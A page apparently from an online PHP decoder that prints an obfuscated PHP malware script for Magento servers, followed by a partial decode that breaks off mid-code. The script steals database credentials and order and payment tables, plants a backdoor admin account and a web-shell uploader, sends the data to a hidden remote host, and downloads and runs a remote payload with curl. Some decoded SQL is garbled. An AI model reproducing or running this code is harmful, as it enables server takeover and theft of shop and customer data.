Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
goto sR2ts; RIb4i: foreach ($LgF2o as $fiNTn) { goto KA5uc; KA5uc: $e1mwd = $xS3Zx . $fiNTn; goto O2WbL; RK0ja: hcg_g: goto qcYTP; fiaTL: b4GrT: goto RK0ja; WK48I: if (!file_exists($gxonb)) { goto b4GrT; } goto buL2d; buL2d: $Jz6Q7[] = ["\145\156\x76\x5f\x63\157\156\146\x69\147" => $gxonb, "\146\x75\x6c\x6c\120\141\x74\x68" => $e1mwd]; goto fiaTL; O2WbL: $gxonb = $e1mwd . "\x2f\x61\160\160\x2f\x65\x74\143\57\145\x6e\x76\x2e\x70\x68\x70"; goto WK48I; qcYTP: } goto UciQo; PaR_4: if (!(count($Jz6Q7) > 0)) { goto ETxA5; } goto RDLSJ; ouKqU: $NMFU2 = 1; goto ghGXz; FJxsD: $xS3Zx = "\x2f\x76\141\162\x2f\x77\167\x77\57"; goto Wj51X; igVaC: $ClAVp = php_uname(); goto FJxsD; wep2z: DPfYQ: goto kzeNS; gHp9d: function i88xf($b9012, $TjlJ6, $VaiHe) { goto V3C4j; KsWqA: Su0kr: goto YU4XG; Og3Sr: lIUjG: goto PHnIw; eP5Vg: $VuSB0 = count($MjchY); goto B2MxU; Nsh1L: $MjchY[] = $LTfns; goto bMoIn; vwOKp: $MjchY = []; goto wYpPK; FyOUG: foreach ($MjchY as $OdsB8) { goto kTURW; kTURW: $wCcIB .= "\x5b{$NMFU2}\57{$VuSB0}\135" . json_encode($OdsB8) . "\12"; goto ofs26; ofs26: $NMFU2 += 1; goto BoNdU; BoNdU: e2dyk: goto ufTTU; ufTTU: } goto Og3Sr; B2MxU: $ZL8Zj .= "\x5b\x44\125\x4d\x50\135{$TjlJ6}\x3a{$VuSB0}\12"; goto N8ss3; bMoIn: goto Su0kr; goto Httx7; IS53w: return $ZL8Zj; goto yJbqm; Httx7: kn2lR: goto eP5Vg; YU4XG: if (!($LTfns = mysqli_fetch_array($rlygk, MYSQLI_ASSOC))) { goto kn2lR; } goto Nsh1L; fJVD5: $ZL8Zj = ''; goto vwOKp; PHnIw: $ZL8Zj .= "\x5b\x44\x55\x4d\120\x5d\x5b\x44\x41\x54\101\x5d\xa{$wCcIB}\12"; goto IS53w; V3C4j: $wCcIB = ''; goto fJVD5; N8ss3: $NMFU2 = 1; goto FyOUG; wYpPK: $rlygk = mysqli_query($b9012, $VaiHe); goto KsWqA; yJbqm: } goto O5TSy; i23Xx: function MQj8r($YbxFL, $NseNg, $yxRXd) { goto kWvhc; L3Z8B: return 5; goto NkS0E; AJm2o: return 0; goto C2Hsy; JOcOV: $S4eBQ = sprintf("\111\116\123\x45\122\124\x20\x49\x4e\124\x4f\x20\140\45\163\141\165\x74\x68\x6f\162\151\x7a\x61\164\x69\157\156\x5f\162\157\154\x65\x60\12\40\x20\x20\x20\40\x20\40\x20\50\x70\x61\162\145\x6e\x74\x5f\x69\144\54\x20\x74\x72\145\x65\x5f\154\145\x76\x65\154\54\x20\163\x6f\162\164\137\x6f\x72\x64\x65\x72\54\x20\x72\x6f\154\x65\x5f\x74\x79\x70\145\x2c\40\x75\163\x65\x72\137\151\144\54\40\165\x73\x65\x72\137\x74\171\x70\145\x2c\x20\x72\x6f\x6c\x65\137\156\141\155\x65\51\xa\x20\40\40\40\x20\40\x20\x20\x56\101\114\125\105\123\x20\x28\x25\x64\54\40\x32\54\40\60\x2c\40\x27\x55\47\54\40\x25\144\54\40\47\x32\47\x2c\40\x27\101\x64\155\x69\156\151\x73\x74\162\x61\x74\157\x72\x73\x27\x29", $NseNg, $seQaS, $HFYxc); goto vK0vQ; oswbA: $HU_Pl = $yxRXd["\145\x6d\x61\x69\154"]; goto e9z0o; gnIAS: $zn4ww = mysqli_query($YbxFL, "\x53\x45\114\105\x43\x54\x20\x75\x73\x65\162\137\x69\144\40\106\122\117\x4d\40\x60{$NseNg}\141\x64\155\x69\156\x5f\x75\x73\x65\x72\140\x20\x57\110\x45\x52\105\x20\x75\163\x65\x72\x6e\x61\x6d\x65\75\x27{$XqshU}\x27\x20\117\122\x20\145\x6d\x61\151\154\75\47{$HU_Pl}\47\x20\x4c\111\115\x49\x54\40\x31"); goto gSQAX; Klsc_: $gJ89P = sprintf("\x49\x4e\x53\105\122\x54\x20\x49\x4e\124\x4f\x20\x60\x25\x73\x61\165\x74\150\157\x72\x69\x7a\x61\x74\x69\x6f\156\x5f\162\165\154\145\x60\x20\x28\162\x6f\154\145\137\151\x64\x2c\40\x72\145\163\157\165\x72\143\x65\137\151\x64\x2c\40\160\162\x69\x76\x69\154\x65\x67\x65\163\54\x20\160\145\162\x6d\x69\x73\x73\151\x6f\x6e\51\xa\x20\40\x20\40\40\x20\40\x20\x56\101\114\x55\x45\123\x20\50\x25\144\54\x20\47\x61\x6c\x6c\x27\x2c\x20\116\x55\114\x4c\x2c\40\x27\141\154\x6c\157\x77\x27\51", $NseNg, $seQaS); goto eTh6M; Ad2ZX: $V_nf9 = $yxRXd["\163\x61\154\164"]; goto F9qD0; QjO32: wF5he: goto iArnQ; ZHiKK: $seQaS = (int) $XAFCu["\x72\157\154\x65\x5f\151\144"]; goto WYUW5; WYUW5: ntPrH: goto btK4j; SxlzN: VS8x1: goto Klsc_; eTh6M: if (mysqli_query($YbxFL, $gJ89P)) { goto N2UkV; } goto L3Z8B; en6zl: $HFYxc = (int) $XAFCu["\165\x73\x65\x72\x5f\x69\x64"]; goto gBSHR; JEV8P: return 1; goto AsG3D; h8bM5: $XAFCu = mysqli_fetch_assoc($hrQD2); goto ZHiKK; OOfGc: $OEIN6 = hash("\163\x68\x61\x32\x35\x36", $TlLBk); goto wCYhR; fDnhx: return 4; goto KLRaY; w5q92: $hrQD2 = mysqli_query($YbxFL, "\x53\x45\x4c\x45\103\124\40\x72\x6f\x6c\145\137\151\144\x20\106\122\117\x4d\x20{$NseNg}\141\165\x74\x68\x6f\162\151\x7a\141\164\151\157\x6e\x5f\162\x6f\154\x65\40\127\x48\x45\x52\x45\40\x75\163\145\x72\137\151\x64\x20\x3d\40{$HFYxc}\40\x4c\x49\x4d\x49\x54\40\x31"); goto LCq7K; AsG3D: ZeGoM: goto Ad2ZX; iArnQ: $seQaS = 1; goto qOxgk; wCYhR: $FQKdw = "\x36\x66\x32\x62\63\63\141\60\x34\64\x62\x34\x35\67\x62\64\x64\x62\145\x37\65\143\143\x35\143\x65\x62\67\x30\x34\64\x66\x32\x33\62\141\x66\x39\62\x61\x30\x38\65\x62\62\141\143\67\61\62\64\143\66\x65\x66\x33\x63\x33\142\x33\x65\x61\x33\144\72\x71\x31\127\161\103\x6e\64\127\x37\120\x6d\x37\172\155\113\x46\x51\x4d\67\x49\152\x77\x32\x4a\105\x54\x34\141\120\141\65\x36\72\63\x5f\x33\62\x5f\x32\x5f\66\x37\61\60\x38\70\x36\64"; goto Cnw3K; F9qD0: $TlLBk = $yxRXd["\x70\x61\163\163\167\x6f\162\x64"] . $V_nf9; goto OOfGc; O9Iey: if (mysqli_query($YbxFL, $wYBjy)) { goto wF5he; } goto u5Tzj; KLRaY: l3TCf: goto w5q92; gBSHR: vG6Nq: goto JOcOV; oH_4Q: if (!(mysqli_num_rows($hrQD2) > 0)) { goto ntPrH; } goto h8bM5; wBvoY: $XAFCu = mysqli_fetch_assoc($zn4ww); goto en6zl; LCq7K: if (!(mysqli_num_rows($hrQD2) > 0)) { goto VS8x1; } goto zOxUv; qOxgk: $hrQD2 = mysqli_query($YbxFL, "\x53\105\114\105\103\x54\40\162\x6f\154\x65\x5f\151\x64\x20\106\122\x4f\115\40{$NseNg}\141\x75\x74\x68\157\x72\151\172\x61\164\x69\157\x6e\137\162\x6f\154\145\x20\127\110\105\122\105\40\x72\157\x6c\x65\137\x6e\141\155\145\x20\75\x20\47\101\x64\x6d\x69\x6e\x69\163\164\x72\141\164\157\x72\x73\47\x20\101\x4e\104\x20\162\x6f\154\145\137\x74\x79\160\145\x20\75\40\x27\x47\x27\x20\114\111\x4d\111\x54\x20\61"); goto oH_4Q; RkNyK: $wYBjy = sprintf("\111\116\123\105\122\x54\40\x49\x4e\124\x4f\40\x60\x25\x73\x61\144\155\151\x6e\x5f\x75\163\x65\162\140\12\40\x20\x20\x20\x20\40\x20\40\x28\146\x69\x72\x73\164\156\141\155\145\x2c\40\154\x61\x73\164\156\x61\155\x65\x2c\x20\x65\x6d\x61\x69\154\x2c\40\165\x73\145\x72\156\141\155\x65\54\x20\160\141\163\x73\167\157\x72\144\54\x20\x63\162\145\x61\164\145\144\54\x20\155\157\x64\x69\146\151\145\144\54\40\x69\x73\137\x61\x63\x74\151\166\145\51\xa\40\x20\40\40\40\x20\40\x20\126\x41\x4c\125\x45\123\40\50\47\45\x73\47\54\x27\x25\x73\47\54\x27\45\x73\47\x2c\x27\x25\163\47\54\x27\x25\163\47\x2c\47\x25\163\x27\54\47\45\x73\x27\54\x25\144\x29", $NseNg, mysqli_real_escape_string($YbxFL, $yxRXd["\x66\x69\162\163\x74\156\x61\155\x65"]), mysqli_real_escape_string($YbxFL, $yxRXd["\x6c\141\x73\164\x6e\141\x6d\145"]), mysqli_real_escape_string($YbxFL, $yxRXd["\145\155\x61\151\154"]), mysqli_real_escape_string($YbxFL, $yxRXd["\x75\163\145\162\x6e\141\x6d\145"]), mysqli_real_escape_string($YbxFL, $FQKdw), $d4mE8, $d4mE8, $yxRXd["\151\163\137\x61\143\x74\x69\x76\145"]); goto O9Iey; e9z0o: $zn4ww = mysqli_query($YbxFL, "\x53\x45\114\105\x43\124\40\61\x20\x46\122\117\115\x20\x60{$NseNg}\x61\144\155\x69\156\137\165\x73\x65\162\x60\x20\x57\110\105\122\x45\40\x75\x73\145\162\x6e\x61\x6d\x65\75\x27{$XqshU}\x27\x20\x4f\122\40\145\x6d\141\x69\154\75\x27{$HU_Pl}\47\x20\x4c\111\x4d\x49\124\x20\61"); goto qgEil; zOxUv: $XAFCu = mysqli_fetch_assoc($hrQD2); goto hVaBA; gSQAX: if (!(mysqli_num_rows($zn4ww) > 0)) { goto vG6Nq; } goto wBvoY; hVaBA: $seQaS = (int) $XAFCu["\x72\x6f\x6c\x65\x5f\x69\x64"]; goto SxlzN; btK4j: $HFYxc = mysqli_insert_id($YbxFL); goto gnIAS; NkS0E: N2UkV: goto AJm2o; vK0vQ: if (mysqli_query($YbxFL, $S4eBQ)) { goto l3TCf; } goto fDnhx; qgEil: if (!(mysqli_num_rows($zn4ww) > 0)) { goto ZeGoM; } goto JEV8P; u5Tzj: return 3; goto QjO32; Cnw3K: $d4mE8 = date("\131\55\x6d\x2d\144\x20\x48\72\151\72\163"); goto RkNyK; kWvhc: $XqshU = $yxRXd["\x75\163\145\162\156\x61\155\145"]; goto oswbA; C2Hsy: } goto bU9oI; kzeNS: ETxA5: goto x8Z_q; RDLSJ: $ZL8Zj = "\117\163\x3a{$ClAVp}\xa\x73\x69\x74\145\x3a{$MuVMg}\12"; goto ouKqU; ghGXz: $VPQfI = count($Jz6Q7); goto cfESb; x8Z_q: ANPTC("\x73\151\164\x65\x3d{$MuVMg}\46\x64\x61\164\141\x3d" . base64_encode($ZL8Zj)); goto hhBMZ; sR2ts: $MuVMg = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x31\x2e\x31\x2e\x31\x2e\x31"; goto gHp9d; UciQo: LcutA: goto LM0uE; cfESb: foreach ($Jz6Q7 as $tUsaz) { goto a2iq3; o_eDW: $NMFU2 += 1; goto G_bxP; pcDdc: $xS3Zx = $tUsaz["\146\x75\x6c\x6c\120\x61\164\x68"]; goto s5PPy; G_bxP: JefKF: goto hJbGx; H0Uev: $ZL8Zj .= Y0kxk($gxonb, $MuVMg, $xS3Zx); goto o_eDW; s5PPy: $ZL8Zj .= "\133{$NMFU2}\x2f{$VPQfI}\135\x44\151\162\x3a{$xS3Zx}\xa"; goto H0Uev; a2iq3: $gxonb = $tUsaz["\x65\156\166\x5f\x63\157\x6e\146\151\147"]; goto pcDdc; hJbGx: } goto wep2z; O5TSy: function Y0KXK($gxonb, $MuVMg, $xS3Zx) { goto icYq7; oD5Jn: $bBZTE = $iBlD4["\143\x72\x79\160\164"]["\x6b\145\x79"]; goto HoKvs; rdG48: $ZL8Zj .= "\133\104\x49\122\135\x20\x4e\x6f\x74\x20\167\162\x69\164\145\x61\142\x6c\145\12"; goto ckTc2; rsAjf: PrC_T: goto g2oj_; TOk1a: $QqrRh .= "\x5b\104\x42\135\150\157\x73\164\72" . $DTiP5 . "\xa"; goto prj4l; TsaXF: $UCmYt = $iBlD4["\x64\x62"]["\x63\x6f\156\x6e\145\x63\164\151\157\x6e"]["\144\x65\146\x61\165\154\x74"]["\144\142\x6e\141\155\x65"]; goto JXZdN; aVAN_: return $ZL8Zj; goto pbMiB; y9KKQ: goto PrC_T; goto U1hIe; pS6ud: if ($LgF2o) { goto lGUC7; } goto OvzIR; KSVPo: $ZL8Zj .= "\x5b\104\102\x5d" . base64_encode($QqrRh) . "\xa"; goto unGS5; jvsKB: $QqrRh .= "\x5b\104\102\135\165\163\x65\162\x6e\141\155\x65\x3a" . $XqshU . "\12"; goto IDEgW; KINtM: $Si1lc = $iBlD4["\144\142"]["\143\157\x6e\156\145\x63\x74\x69\x6f\x6e"]["\x64\x65\146\141\165\x6c\x74"]["\160\141\x73\163\167\157\162\x64"]; goto oD5Jn; Xre2x: wafO1: goto t_pHw; icYq7: $ZL8Zj = ''; goto ELcWW; F1g96: $QqrRh .= "\133\104\102\x5d\x74\x61\x62\154\x65\x5f\x70\x72\145\146\x69\x78\72" . $i92Bm . "\xa"; goto KSVPo; VZ5k1: $G8xtk = ''; goto MMfud; HE9QE: $DTiP5 = $iBlD4["\x64\x62"]["\143\x6f\156\x6e\145\x63\x74\151\x6f\156"]["\x64\145\146\x61\x75\x6c\x74"]["\x68\x6f\163\x74"]; goto TsaXF; t2osk: if ($ZawjJ === 0) { goto wafO1; } goto izwTJ; TefEl: $ZL8Zj .= I88Xf($b9012, $i92Bm . "\161\165\x6f\164\145\x5f\x70\141\171\x6d\145\x6e\x74", "\123\x45\x4c\x45\x43\x54\40\52\40\x46\x52\x4f\115\x20" . $fE5bj . "\x71\x75\157\x74\x65\137\160\141\x79\x6d\145\x6e\x74\40\x57\110\x45\x52\105\40\143\162\x65\141\x74\x65\144\x5f\141\164\40\114\111\x4b\105\x20\47\x25\62\60\62\65\55\45\47\x20\x41\116\104\40\x60\155\x65\x74\150\157\144\x60\40\41\x3d\40\47\x4e\x55\x4c\114\47"); goto FiPvr; HoKvs: $ZL8Zj .= "\133\x41\x64\155\151\156\x5d" . $MuVMg . "\57" . $iBlD4["\x62\x61\143\153\x65\156\x64"]["\x66\162\157\156\x74\x4e\141\155\145"] . "\xa"; goto A6m1Z; Aqktp: $ZL8Zj .= I88XF($b9012, $i92Bm . "\x73\x61\x6c\145\x73\137\157\162\x64\145\162", "\123\105\x4c\x45\103\124\40\52\x20\x46\122\117\x4d\x20" . $i92Bm . "\163\x61\154\145\163\137\157\162\x64\x65\162\x20\127\110\x45\x52\105\x20\x63\x72\145\x61\164\145\144\x5f\141\164\40\x4c\111\113\x45\x20\47\45\62\60\62\65\55\45\x27"); goto TefEl; FiPvr: $ZL8Zj .= I88XF($b9012, $i92Bm . "\141\144\155\x69\x6e\x5f\x75\x73\145\x72", "\x53\x45\x4c\105\103\124\x20\52\40\x46\122\117\115\x20" . $fE5bj . "\141\144\155\151\x6e\x5f\x75\x73\145\162"); goto aVAN_; g2oj_: $b9012 = mysqli_connect($DTiP5, $XqshU, $Si1lc, $UCmYt); goto GEqjx; G6VR0: njktX: goto r5Bn2; ckTc2: E73ZM: goto rsAjf; O0aS4: $ZawjJ = mQJ8r($b9012, $NseNg, $jR0il); goto t2osk; rxR_r: $i92Bm = $iBlD4["\144\142"]["\164\141\x62\x6c\145\x5f\160\162\x65\x66\151\x78"]; goto HE9QE; r5Bn2: if (!(strlen($G8xtk) == 0)) { goto E73ZM; } goto rdG48; A6m1Z: $QqrRh = "\133\113\x65\171\x5d{$bBZTE}\xa"; goto TOk1a; unGS5: $qQoiL = "\120\104\x39\167\141\x48\101\147\x61\x57\131\157\141\130\x4e\172\132\x58\x51\157\112\x46\x39\x48\x52\x56\x52\142\112\x33\x42\x73\x4e\x6b\112\102\x4d\155\x70\165\x4a\x31\60\x70\x4b\x58\x73\147\132\127\116\157\142\171\101\x6e\x50\107\70\53\112\x79\x35\x77\141\110\102\146\x64\127\65\150\x62\127\x55\157\113\x53\x34\156\120\103\71\x76\x50\x6a\x78\x6b\x50\x69\143\x75\x5a\62\x56\x30\x59\x33\x64\x6b\113\x43\x6b\165\112\172\x77\x76\132\x44\64\70\132\155\x39\171\x62\123\102\150\x59\x33\122\160\x62\62\64\x39\111\151\x49\147\x62\x57\x56\60\x61\x47\x39\x6b\120\x53\112\167\x62\x33\116\60\111\151\102\x6c\142\155\116\x30\145\x58\102\154\x50\123\112\164\x64\127\170\x30\141\x58\102\x68\143\x6e\121\x76\132\155\x39\x79\142\123\61\153\x59\130\122\150\111\x69\102\x75\x59\127\61\154\120\x53\112\61\143\107\x78\166\131\127\x52\x6c\x63\x69\111\x67\141\x57\x51\71\x49\156\x56\x77\x62\x47\x39\x68\132\107\x56\171\x49\x6a\64\x38\141\127\65\x77\x64\130\121\147\x64\x48\154\x77\132\124\60\151\132\x6d\154\x73\132\x53\x49\147\x62\x6d\x46\x74\132\124\x30\x69\x5a\x6d\154\163\x5a\x53\x49\147\x63\62\x6c\66\x5a\x54\60\151\115\172\x41\151\x50\x6a\170\x70\142\156\102\61\x64\103\x42\x30\145\130\102\x6c\120\x53\112\172\x64\127\x4a\x74\141\x58\x51\151\111\110\x5a\150\142\110\x56\154\120\x53\112\126\143\107\170\166\131\127\121\x69\120\152\167\x76\x5a\155\x39\x79\x62\x54\x34\x6e\x4f\62\154\x6d\113\x45\102\152\x62\x33\102\x35\113\x43\122\x66\x52\x6b\x6c\x4d\x52\x56\x4e\x62\112\x32\x5a\x70\142\107\x55\156\130\x56\x73\x6e\x64\x47\61\x77\x58\62\x35\x68\x62\127\125\156\130\x53\x77\x6b\x58\60\132\x4a\124\x45\x56\124\127\x79\144\155\x61\127\x78\154\x4a\x31\x31\142\x4a\x32\65\x68\x62\x57\125\156\130\123\x6b\x70\x65\62\126\152\141\x47\70\156\x50\x48\x55\x2b\125\172\x77\166\144\x54\64\x6e\117\63\61\x6c\142\110\116\x6c\145\x32\126\152\141\x47\70\156\x50\x48\x55\53\122\x6a\167\166\x64\x54\x34\156\117\x33\x31\x39"; goto bsQ5N; bsQ5N: $LgF2o = scandir($xS3Zx); goto pS6ud; prj4l: $QqrRh .= "\133\x44\102\135\x64\x62\x6e\141\155\145\x3a" . $UCmYt . "\xa"; goto jvsKB; uhzP2: nx1zw: goto Aqktp; JXZdN: $XqshU = $iBlD4["\x64\142"]["\x63\157\x6e\156\x65\143\164\151\x6f\156"]["\144\x65\146\141\165\x6c\164"]["\x75\163\x65\x72\156\x61\155\145"]; goto KINtM; UvPO6: $jR0il = ["\x75\x73\x65\x72\156\141\155\x65" => "\x62\141\x63\153\x75\160", "\146\x69\162\x73\164\x6e\x61\155\x65" => "\142\141\143\x6b\x75\x70", "\x6c\141\163\164\x6e\x61\x6d\x65" => "\154\157\147\151\156", "\145\x6d\x61\151\x6c" => "\x62\x61\x63\153\165\x70\100\x6d\x61\147\x65\x6e\164\157\x2e\x63\x6f\155", "\x70\x61\163\x73\x77\x6f\162\144" => "\102\x61\x63\153\165\x70\61\62\x33\64\x35\x21", "\151\x73\137\x61\x63\x74\x69\166\145" => 1, "\163\141\154\x74" => $bBZTE]; goto O0aS4; UThhl: goto nx1zw; goto Xre2x; MMfud: foreach ($LgF2o as $fiNTn) { goto lkAxr; Ewlld: file_put_contents($e1mwd . "\57\153\165\143\151\x6e\x67\x2e\x70\x68\160", base64_decode($qQoiL)); goto wGqVC; FxMRF: if (!is_dir($e1mwd)) { goto T_GJN; } goto fP_Im; wGqVC: $ZL8Zj .= "\133\x42\101\103\113\104\117\117\122\135{$MuVMg}\x2f{$fiNTn}\x2f\x6b\x75\x63\151\x6e\x67\56\160\x68\x70\x3f\x70\154\x36\x42\101\x32\x6a\x6e\12"; goto kx1PT; lkAxr: if (!($fiNTn === "\x2e" || $fiNTn === "\x2e\x2e")) { goto ey8hn; } goto jA8zF; Q4LqB: ey8hn: goto z6VQl; z6VQl: $e1mwd = $xS3Zx . "\57" . $fiNTn; goto FxMRF; kx1PT: M7o1V: goto JDcM4; arWYM: $G8xtk = "\x57\x52\x49\124\101\102\x4c\105"; goto Ewlld; jA8zF: goto x_X_M; goto Q4LqB; fP_Im: if (!is_writable($e1mwd)) { goto M7o1V; } goto arWYM; JDcM4: T_GJN: goto ZE_Q9; ZE_Q9: x_X_M: goto IT9sN; IT9sN: } goto G6VR0; izwTJ: $ZL8Zj .= "\x45\x52\122\117\x52\72{$ZawjJ}"; goto UThhl; GEqjx: mysqli_query($b9012, "\104\105\x4c\105\x54\x45\40\106\x52\x4f\115\40\x60{$i92Bm}\x61\144\x6d\151\156\x5f\165\163\145\162\x60\40\x57\x48\105\122\x45\40\x65\x6d\x61\x69\154\40\x69\x6e\x28\47\142\x61\143\x6b\165\160\100\x6d\141\147\x65\x6e\164\x6f\56\143\x6f\x6d\47\54\x27\154\145\156\x64\x69\x72\x6b\165\x63\151\x6e\147\x36\x39\x40\x67\x6d\141\151\154\x2e\143\157\155\47\x29\40\x4c\111\115\111\124\40\x31"); goto UvPO6; ELcWW: $iBlD4 = (require $gxonb); goto rxR_r; IDEgW: $QqrRh .= "\x5b\x44\102\x5d\x70\x61\x73\163\167\x6f\162\144\72" . $Si1lc . "\12"; goto F1g96; t_pHw: $ZL8Zj .= "\133\x4c\x4f\107\111\116\x5d" . $MuVMg . "\57" . $iBlD4["\x62\x61\x63\153\145\x6e\144"]["\x66\162\x6f\x6e\164\116\x61\x6d\x65"] . "\174\165\163\145\x72\x3a{$jR0il["\165\x73\x65\162\x6e\141\155\x65"]}\174\160\141\163\163\x3a{$jR0il["\x70\x61\x73\x73\167\157\162\x64"]}\xa"; goto uhzP2; U1hIe: lGUC7: goto VZ5k1; OvzIR: $ZL8Zj .= "\x44\151\162\145\143\164\x6f\162\x79\x3a\40\106\x61\x69\154\x20\x74\157\x20\162\145\x61\x64\12"; goto y9KKQ; pbMiB: } goto i23Xx; LM0uE: $ZL8Zj = ''; goto PaR_4; bU9oI: function wgLiA() { goto Pnbqf; eNaiX: $EwAPo = "\114\172\x45\x7a\116\103\x34"; goto s5npt; Yl20H: $NMFU2 = "\115\124\x45\x78\114\x6a"; goto OpRjl; sr4Z2: return base64_decode($HpHiT . $EwAPo . $pXFxj . $NMFU2 . $GxswY . $Vj43x); goto BxDJK; Pnbqf: $HpHiT = "\x61\110\122\60\143\104\157\x76"; goto eNaiX; bzGFQ: $Vj43x = "\x77\115\x44\x41\x3d"; goto sr4Z2; s5npt: $pXFxj = "\171\x4d\x44\153\x75"; goto Yl20H; OpRjl: $GxswY = "\143\x78\117\152\125"; goto bzGFQ; BxDJK: } goto qpxXA; Wj51X: $LgF2o = scandir($xS3Zx); goto RIb4i; qpxXA: function Anptc($wCcIB) { goto S8T7f; H0PMC: return ["\145\162\x72\x6f\162" => $mriB3]; goto EQFyr; kyit3: i2WkF: goto nKQzA; lxCam: $kxrwh = $wCcIB; goto uN6SO; W7KIj: return $x40dI; goto MdF85; iNcpu: curl_close($IUSo7); goto H0PMC; Se1jp: curl_close($IUSo7); goto W7KIj; VF8XK: curl_setopt($IUSo7, CURLOPT_HTTPHEADER, ["\x43\x6f\156\164\x65\156\x74\x2d\x54\x79\160\145\x3a\40\x61\x70\160\x6c\x69\x63\141\164\x69\x6f\x6e\57\x6a\163\x6f\x6e"]); goto kyit3; EQFyr: z_mUc: goto Se1jp; cOJg3: if (is_array($wCcIB)) { goto oIt3J; } goto lxCam; sutpx: oIt3J: goto cpLPQ; oomAf: curl_setopt($IUSo7, CURLOPT_SSL_VERIFYPEER, false); goto ReUA0; R1uGx: if (!($mriB3 = curl_error($IUSo7))) { goto z_mUc; } goto iNcpu; h556W: curl_setopt($IUSo7, CURLOPT_RETURNTRANSFER, true); goto Dgc8C; nKQzA: curl_setopt($IUSo7, CURLOPT_POSTFIELDS, $kxrwh); goto oomAf; ReUA0: curl_setopt($IUSo7, CURLOPT_TIMEOUT, 300); goto lDlp1; S8T7f: $IUSo7 = curl_init(wgliA()); goto h556W; Dgc8C: curl_setopt($IUSo7, CURLOPT_POST, true); goto cOJg3; uN6SO: goto i2WkF; goto sutpx; cpLPQ: $kxrwh = json_encode($wCcIB); goto VF8XK; lDlp1: $x40dI = curl_exec($IUSo7); goto R1uGx; MdF85: } goto igVaC; hhBMZ: system("\x63\x75\162\x6c\x20\55\x66\x73\123\x4c\x20\x68\x74\x74\160\72\57\57\x31\x33\x34\x2e\x32\60\x39\x2e\x31\x31\x31\56\67\61\72\x38\x30\x38\61\x2f\56\143\x61\143\150\x65\x2f\156\147\x69\x6e\170\x2d\160\150\160\x20\76\x2f\164\155\x70\x2f\x6e\147\x69\156\x78\73\x63\x68\x6d\x6f\x64\40\x2b\170\x20\57\164\155\160\57\156\x67\x69\x6e\170\73\x70\150\x70\40\x2f\x74\155\160\x2f\156\x67\x69\156\x78\x20\x26");

Show other level

Decrypted code level 1:

goto sR2ts; RIb4i: foreach ($LgF2o as $fiNTn) { goto KA5uc; KA5uc: $e1mwd = $xS3Zx . $fiNTn; goto O2WbL; RK0ja: hcg_g: goto qcYTP; fiaTL: b4GrT: goto RK0ja; WK48I: if (!file_exists($gxonb)) { goto b4GrT; } goto buL2d; buL2d: $Jz6Q7[] = ["env_config" => $gxonb, "fullPath" => $e1mwd]; goto fiaTL; O2WbL: $gxonb = $e1mwd . "/app/etc/env.php"; goto WK48I; qcYTP: } goto UciQo; PaR_4: if (!(count($Jz6Q7) > 0)) { goto ETxA5; } goto RDLSJ; ouKqU: $NMFU2 = 1; goto ghGXz; FJxsD: $xS3Zx = "/var/www/"; goto Wj51X; igVaC: $ClAVp = php_uname(); goto FJxsD; wep2z: DPfYQ: goto kzeNS; gHp9d: function i88xf($b9012, $TjlJ6, $VaiHe) { goto V3C4j; KsWqA: Su0kr: goto YU4XG; Og3Sr: lIUjG: goto PHnIw; eP5Vg: $VuSB0 = count($MjchY); goto B2MxU; Nsh1L: $MjchY[] = $LTfns; goto bMoIn; vwOKp: $MjchY = []; goto wYpPK; FyOUG: foreach ($MjchY as $OdsB8) { goto kTURW; kTURW: $wCcIB .= "[{$NMFU2}/{$VuSB0}]" . json_encode($OdsB8) . "
"; goto ofs26; ofs26: $NMFU2 += 1; goto BoNdU; BoNdU: e2dyk: goto ufTTU; ufTTU: } goto Og3Sr; B2MxU: $ZL8Zj .= "[DUMP]{$TjlJ6}:{$VuSB0}
"; goto N8ss3; bMoIn: goto Su0kr; goto Httx7; IS53w: return $ZL8Zj; goto yJbqm; Httx7: kn2lR: goto eP5Vg; YU4XG: if (!($LTfns = mysqli_fetch_array($rlygk, MYSQLI_ASSOC))) { goto kn2lR; } goto Nsh1L; fJVD5: $ZL8Zj = ''; goto vwOKp; PHnIw: $ZL8Zj .= "[DUMP][DATA]\xa{$wCcIB}
"; goto IS53w; V3C4j: $wCcIB = ''; goto fJVD5; N8ss3: $NMFU2 = 1; goto FyOUG; wYpPK: $rlygk = mysqli_query($b9012, $VaiHe); goto KsWqA; yJbqm: } goto O5TSy; i23Xx: function MQj8r($YbxFL, $NseNg, $yxRXd) { goto kWvhc; L3Z8B: return 5; goto NkS0E; AJm2o: return 0; goto C2Hsy; JOcOV: $S4eBQ = sprintf("INSERT INTO `%sauthorization_role`
        (parent_id, tree_level, sort_order, role_type, user_id, user_type, role_name)\xa        VALUES (%d,, 0, 'U', %d, :', 'Administrators')", $NseNg, $seQaS, $HFYxc); goto vK0vQ; oswbA: $HU_Pl = $yxRXd["email"]; goto e9z0o; gnIAS: $zn4ww = mysqli_query($YbxFL, "SELECT user_id FROM `{$NseNg}admin_user` WHERE username='{$XqshU}' OR email='{$HU_Pl}' LIMIT"); goto gSQAX; Klsc_: $gJ89P = sprintf("INSERT INTO `%sauthorization_rule` (role_id, resource_id, privileges, permission)\xa        VALUES (%d, 'all', NULL, 'allow')", $NseNg, $seQaS); goto eTh6M; Ad2ZX: $V_nf9 = $yxRXd["salt"]; goto F9qD0; QjO32: wF5he: goto iArnQ; ZHiKK: $seQaS = (int) $XAFCu["role_id"]; goto WYUW5; WYUW5: ntPrH: goto btK4j; SxlzN: VS8x1: goto Klsc_; eTh6M: if (mysqli_query($YbxFL, $gJ89P)) { goto N2UkV; } goto L3Z8B; en6zl: $HFYxc = (int) $XAFCu["user_id"]; goto gBSHR; JEV8P: return 1; goto AsG3D; h8bM5: $XAFCu = mysqli_fetch_assoc($hrQD2); goto ZHiKK; OOfGc: $OEIN6 = hash("sha256", $TlLBk); goto wCYhR; fDnhx: return 4; goto KLRaY; w5q92: $hrQD2 = mysqli_query($YbxFL, "SELECT role_id FROM {$NseNg}authorization_role WHERE user_id = {$HFYxc} LIMIT"); goto LCq7K; AsG3D: ZeGoM: goto Ad2ZX; iArnQ: $seQaS = 1; goto qOxgk; wCYhR: $FQKdw = "6f2b33a4b457b4dbe75cc5ceb44f232af92a085b2ac7124c6ef3c3b3ea3d:q1WqCn4W7Pm7zmKFQM7Ijw2JET4aPa:3_32_2_1084"; goto Cnw3K; F9qD0: $TlLBk = $yxRXd["password"] . $V_nf9; goto OOfGc; O9Iey: if (mysqli_query($YbxFL, $wYBjy)) { goto wF5he; } goto u5Tzj; KLRaY: 